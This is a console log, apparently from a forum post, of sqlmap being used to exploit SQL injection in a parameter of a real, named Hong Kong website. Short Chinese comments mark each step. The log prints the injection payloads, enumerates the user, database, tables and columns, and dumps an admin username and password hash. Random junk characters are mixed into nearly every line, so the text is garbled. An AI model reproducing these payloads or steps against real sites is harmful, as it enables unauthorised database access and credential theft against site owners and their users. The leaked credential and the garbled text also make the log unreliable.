D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# v" @- }% p7 u3 F/ Y5 S
ms "Mysql" --current-user /* 注解:获取当前用户名称2 ]/ a2 W* _9 v5 {
sqlmap/0.9 - automatic SQL injection and database takeover tool
4 M5 {* E; P7 b( p% s" C3 ] http://sqlmap.sourceforge.net starting at: 16:53:54
* c8 W$ T* d5 V9 ]+ R) ?[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 N8 M+ m0 @0 Q4 v* y% I! X
session file
' o: K; @5 D& Y* t0 S[16:53:54] [INFO] resuming injection data from session file, {( u+ e9 c! \* R7 e- }- }
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 G1 o; `# T! U9 s: E[16:53:54] [INFO] testing connection to the target url
; V# M4 a" y$ U/ S3 m! V$ u5 msqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 w" F. |, [/ r* M- j2 ests:" S5 A& r/ _. a) e8 ?8 N, ^
---; L C' Q. m! {* G
Place: GET
( O7 C6 _! ~; q# }1 dParameter: id& ?$ c* n8 o) ?2 E: a9 f
Type: boolean-based blind
0 Q: `2 s [% R% Y1 N. s Title: AND boolean-based blind - WHERE or HAVING clause
% }3 J1 K9 |+ N6 h% ^" F7 O7 d Payload: id=276 AND 799=799$ A4 p8 z9 |' B
Type: error-based
' \ \# f }8 l/ _ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 C4 C2 I* C/ l' ^9 v; h% |% N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
) L" f' v/ A3 t- y" F2 r& J4 k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 k+ Y! ~: f# F# D3 A9 H9 |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 C% |; T3 a8 B4 A, v
Type: UNION query9 r% t1 ]: n- _3 ^" Y# u
Title: MySQL UNION query (NULL) - 1 to 10 columns1 a: j/ M% n: v1 r) m5 m- t
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# N$ Z3 M& O0 `% H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 F4 B% }2 I' ^" M9 B% E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) V! J' f0 m- T ]- g
Type: AND/OR time-based blind m7 v; l4 l& g- B8 q
Title: MySQL > 5.0.11 AND time-based blind' w4 G+ x% }% o- z- O# @
Payload: id=276 AND SLEEP(5)
# q7 p/ J [. N# d' f. ]---
8 O5 s( h& T0 W6 x) [/ m[16:53:55] [INFO] the back-end DBMS is MySQL" f! a6 n2 k( Q
web server operating system: Windows
3 t3 e2 j& j" K1 R. u: [web application technology: Apache 2.2.11, PHP 5.3.0+ F' _% Y+ N G
back-end DBMS: MySQL 5.0' A! m* Y- Y7 x
[16:53:55] [INFO] fetching current user
3 `' | U6 X2 J* c% Dcurrent user: 'root@localhost'
# _! V$ ?) J8 C# L; F4 }+ K[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: W1 L3 b& X! k& ~tput\www.wepost.com.hk' shutting down at: 16:53:58
) O; [+ Y7 B0 @9 |* \" @" I: e# T. ^7 ]% ^3 \
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 n& ~3 G9 }' b2 U& G/ c; k
ms "Mysql" --current-db /*当前数据库
/ P1 N4 g, D& Z' g, r5 O# j sqlmap/0.9 - automatic SQL injection and database takeover tool H3 v& p7 m7 N9 M0 d
http://sqlmap.sourceforge.net starting at: 16:54:16% m, h4 L# e: L0 Q) ]
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
$ f' @5 }. @# o) b- Q session file
. ]" a( o* C5 C( A+ h[16:54:16] [INFO] resuming injection data from session file
7 y2 r. S6 v4 L[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 P3 P5 m4 {/ M4 ~# `: l[16:54:16] [INFO] testing connection to the target url
& `9 s" H7 M: J: A! N2 Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
. n* I) M6 W: y7 X; p; ?# ]0 I3 h' Asts:
- X" B1 u. b0 y- H* ~3 k" n' V' E& h---
' y4 c( q2 J, |) xPlace: GET
; _0 _3 K5 X, t$ t1 kParameter: id% l3 j8 X- G# S( \2 e% F3 H
Type: boolean-based blind r2 u6 F1 F1 r) H/ O& F. m( x9 |
Title: AND boolean-based blind - WHERE or HAVING clause
) \/ ]3 U) c0 x; u Payload: id=276 AND 799=799& ]% m0 C) E" M; j1 \
Type: error-based9 u* p7 e7 D) |; `
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. Z& n" L. }+ w% S+ R
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, `8 k: e k" c2 N3 h: X R
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" `5 a8 }* \( ?3 k
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* L+ N# x7 M6 j9 S Type: UNION query
4 ]" q3 T5 q" a! Q4 X, u: B Title: MySQL UNION query (NULL) - 1 to 10 columns
; z9 \" K( r* ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
p5 l" j; B( p" _9 B0 o* t( \(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 [0 w! C9 H- T" f/ x7 ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 ?4 f7 Y4 T% M. E. E$ i( Z5 y: E Type: AND/OR time-based blind% z, [" I$ |/ w3 u3 ^- p
Title: MySQL > 5.0.11 AND time-based blind }' k I/ ^2 D# I% i, D
Payload: id=276 AND SLEEP(5)3 q4 B8 D( I7 j* ~
---/ c# ?# ?+ _) J' r$ O$ V, E
[16:54:17] [INFO] the back-end DBMS is MySQL
# M6 W/ b9 G' ~- W" sweb server operating system: Windows
m( t- X) Y" u* C& y' m* h4 ~web application technology: Apache 2.2.11, PHP 5.3.0
$ u/ ~1 b0 O: N4 f( b" N7 q9 Eback-end DBMS: MySQL 5.0
: Z& M: L0 Q7 d6 {7 r3 t7 Q[16:54:17] [INFO] fetching current database
% U7 H1 h6 t' B( ]* t: Pcurrent database: 'wepost'
) n. T ^ v7 X[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ U' h4 ~, S1 g
tput\www.wepost.com.hk' shutting down at: 16:54:18
3 r5 b% b( k& C. _1 g0 M @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: H R" Y% T% f: Ems "Mysql" --tables -D "wepost" /*获取当前数据库的表名
1 I3 N% y5 a M% }; m. m sqlmap/0.9 - automatic SQL injection and database takeover tool
8 t& E7 m. j7 {, v8 V5 C0 ] http://sqlmap.sourceforge.net starting at: 16:55:25! a k2 k: r0 _1 v4 J
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- C9 P4 h* ~2 `- Y6 x session file
% M- k( N Z6 ?" w( {/ N) V[16:55:25] [INFO] resuming injection data from session file
N5 a6 x1 T7 Z5 ^8 j l5 F7 F6 O& F[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
7 x2 n9 h {' k% F3 W6 G, r[16:55:25] [INFO] testing connection to the target url
$ ^4 p2 c8 P0 j1 a( {; xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 @# d" o( ]) ?) a2 _+ t2 hsts:& V" F& m& u5 i* a3 h7 g9 b
---, v( E- S x9 q: C! L
Place: GET* y4 y' j! r; |% f/ V9 s% v7 p
Parameter: id, d |1 M( Q& |4 M9 K- ~
Type: boolean-based blind5 r2 B8 R+ S' U& S; D; v% P$ F
Title: AND boolean-based blind - WHERE or HAVING clause
+ g7 C4 A# X" I" [. ]1 v q& D Payload: id=276 AND 799=799( @7 O4 I/ `. x' h) j* Q
Type: error-based
+ s6 \3 ^) W2 c E0 h3 f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 o o: M9 A( c( M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 A& \# X4 S. W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 k+ c& c0 r- r$ g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! ]. F9 w% Y7 [1 W' ~' \9 v+ j Type: UNION query5 P0 u4 A8 v: a( g; U8 G( T1 O
Title: MySQL UNION query (NULL) - 1 to 10 columns
# C, Q, K2 C" I; p Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: Z2 |0 Y- Y! q+ U; ]+ `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 f( B$ O: e0 `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 X. I" w& @* U" r Type: AND/OR time-based blind. |, H( A& T: A7 ?- g$ ~
Title: MySQL > 5.0.11 AND time-based blind
, M ^! E9 p# \8 k- \, }8 f* Y Payload: id=276 AND SLEEP(5)
' s4 p! ?" I: c7 W' C! ]---+ i* H9 E0 o: C+ B' x6 a2 O& u
[16:55:26] [INFO] the back-end DBMS is MySQL: |# j3 Z$ S3 m- s
web server operating system: Windows
/ c. I( m/ h/ V2 \3 V" Aweb application technology: Apache 2.2.11, PHP 5.3.02 Q' U0 E# X: k8 k: Y
back-end DBMS: MySQL 5.0
; S, _" @' e, E! @( K7 }8 e4 E[16:55:26] [INFO] fetching tables for database 'wepost'0 m7 A8 ?% e2 l& F
[16:55:27] [INFO] the SQL query used returns 6 entries
" z! G8 R2 B0 k5 u$ hDatabase: wepost; D0 e+ Q) e0 r0 r
[6 tables]
* T; n. Q) ~ a/ D+-------------+
8 J1 b U4 z4 Q8 q1 o; G| admin |
) p& _- ]0 j4 O k7 Q9 T x| article |0 B) v, |* p D
| contributor |. w4 J/ y% @' x4 n
| idea |. v7 ]+ S2 @7 ^1 U0 ~% S
| image |' N G: G, W1 k& F; a) W
| issue |
! e/ F- {: H9 ?+-------------+. Q2 {6 y$ Y" X! y
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou5 V% N7 z( O% L& h9 L
tput\www.wepost.com.hk' shutting down at: 16:55:331 N- ?' C0 ~4 D
& t$ F) K" S! |* C, E3 YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 l. Q( R( w; t: X. e H4 o
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
) l1 Y/ x! n6 A sqlmap/0.9 - automatic SQL injection and database takeover tool
7 ?4 }# l6 P v$ j" J http://sqlmap.sourceforge.net starting at: 16:56:06
. ]1 h8 k# o0 \sqlmap identified the following injection points with a total of 0 HTTP(s) reque& |! E7 D; P) G- s* s
sts:
5 ^) s, H4 ~+ N% B. M3 C0 `0 V) |---/ E- i5 G3 X9 C h# ~- J6 _
Place: GET
- m8 i6 R/ G4 F' N% B7 e7 s/ \5 HParameter: id
& B- i: G0 g$ B0 N2 d! P* r) R Type: boolean-based blind
( { Q( D- H. c Title: AND boolean-based blind - WHERE or HAVING clause% i8 W* f7 p6 y6 G, a4 {* a
Payload: id=276 AND 799=799) `$ ]! A1 I @) b6 x
Type: error-based
( n2 q4 P u+ K& M0 q. E/ T) e Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- j. i+ Q. i3 ?( a* ]0 s Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 @: m- @: R5 h/ f120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( |' S9 M D- B9 Y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) M3 F1 R4 q* {. C1 C9 \1 o
Type: UNION query
% z" e( J8 o0 ?! I7 x Title: MySQL UNION query (NULL) - 1 to 10 columns
; e: A# ~6 a% f3 B" h" S5 A3 R Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ P8 b0 n3 Y0 p
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. J, k, q' i2 O% D+ y; CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& q0 j* E) |) R1 P Type: AND/OR time-based blind% K& Y8 h* X5 O4 f
Title: MySQL > 5.0.11 AND time-based blind5 |+ [5 J) b- C- c
Payload: id=276 AND SLEEP(5)
- A9 \6 S Q7 N5 ^( {0 J3 R( V---( [5 B) v8 {+ p F
web server operating system: Windows, e) w) O, D' V B* f `
web application technology: Apache 2.2.11, PHP 5.3.0
6 X) s# i/ j( z+ a6 `- d' Zback-end DBMS: MySQL 5.0) F6 z# z; x+ Z6 W2 {& W
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se0 W l) V( a7 G T8 d
ssion': wepost, wepost) |6 q+ E6 H% E2 J# ~' ~
Database: wepost
% I/ n, F' d/ r% dTable: admin
9 C; ?( G: e% v: ?9 @; Z[4 columns]
4 a d$ u- V: C* |% \+----------+-------------+2 P: k9 T2 i0 e- Z6 f9 _
| Column | Type |$ p; W9 k' @% K' V3 z6 i2 |
+----------+-------------+4 N4 u: t& `/ k! E
| id | int(11) | @4 N1 c' e+ g1 \6 M q& j
| password | varchar(32) |
0 b7 @4 [8 r% f: R. G: |* x, P| type | varchar(10) |
3 R# H9 y; E+ \/ g1 P6 q1 S2 n3 W| userid | varchar(20) | Z: d# t/ ~) ~, q8 T# Q/ n1 r7 P
+----------+-------------+
% D1 K9 L. k1 e5 ?0 c& Q6 u shutting down at: 16:56:19
4 g1 ^ F/ n0 j, F( d4 U1 v
+ c& O, r% E" U. \) tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" _, |) |( N# V2 U1 w, }/ `# Cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容. C% `# X4 D: [" x( n; H4 M/ P. m' j/ a( M
sqlmap/0.9 - automatic SQL injection and database takeover tool
# a* {% f& Z6 K+ i. ~ http://sqlmap.sourceforge.net starting at: 16:57:141 w, ?% u1 x; `% l
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 @# p/ L, t! [sts:
6 _1 D, e7 h8 U---; ~ M$ e- S& j7 X! I
Place: GET( `* [" k' X& z/ G7 V1 s! s8 G
Parameter: id
" i/ q) Z$ O; h8 V3 d Type: boolean-based blind( n7 ~* W; `; S* I( y4 A
Title: AND boolean-based blind - WHERE or HAVING clause
0 ]( [' A4 m$ I5 i1 I Payload: id=276 AND 799=799+ y; s* B- E F, J$ k2 H: t
Type: error-based1 q# l$ v5 \9 X* A7 B, Y. B" q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% l: z' j- d8 X! W* K Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ J0 | o/ c8 u: r' G$ e
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# D4 w6 ?. u& U; o& }) O: u t),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 G- x% M* q5 s
Type: UNION query4 \* }+ H8 [( m1 O j4 R
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 S9 N/ _) | J# P Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 J7 p4 I8 L [ ]* Y; b4 L- [
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ X5 @: [# o# Y' U, Z' M8 O/ y' u
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- y1 F2 J+ E8 q Type: AND/OR time-based blind: y6 R, P3 u5 W2 r5 B+ C
Title: MySQL > 5.0.11 AND time-based blind0 k* K1 e" ^/ ~% ]1 `: Y
Payload: id=276 AND SLEEP(5): W$ f/ H# n3 `7 R0 t! q& A
---
; L9 i3 V" `% x" ^: w' r- Qweb server operating system: Windows" ^, @" z" n" K
web application technology: Apache 2.2.11, PHP 5.3.0* y; M& V/ J6 h# U6 F
back-end DBMS: MySQL 5.0
0 i! A4 R! Y- D" r* U( }# Mrecognized possible password hash values. do you want to use dictionary attack o0 b% k# a2 a. y4 Q
n retrieved table items? [Y/n/q] y
( ]7 ]+ G8 E- Z4 M" n* bwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
6 @9 j. I0 y% M# }/ D* }1 bdo you want to use common password suffixes? (slow!) [y/N] y P( H" W j& P1 B( Z; R
Database: wepost
1 w0 g3 s" G) q @7 w( xTable: admin
% x4 |- i6 `% ~8 x ^$ Y: [[1 entry]+ y+ ]1 D# l* o' w
+----------------------------------+------------+/ b2 c1 H9 C' t1 c
| password | userid |$ G& W0 t! ~$ n/ V7 F
+----------------------------------+------------+* Y |& S. ?( T" \4 ~" F% }- s' v
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ F+ Q. z: B h; G
+----------------------------------+------------+' e, O- c) \9 M3 ~9 L( ]7 y
shutting down at: 16:58:14" n1 W* W/ D: t8 B
6 f# Q' g( l6 t
D:\Python27\sqlmap> |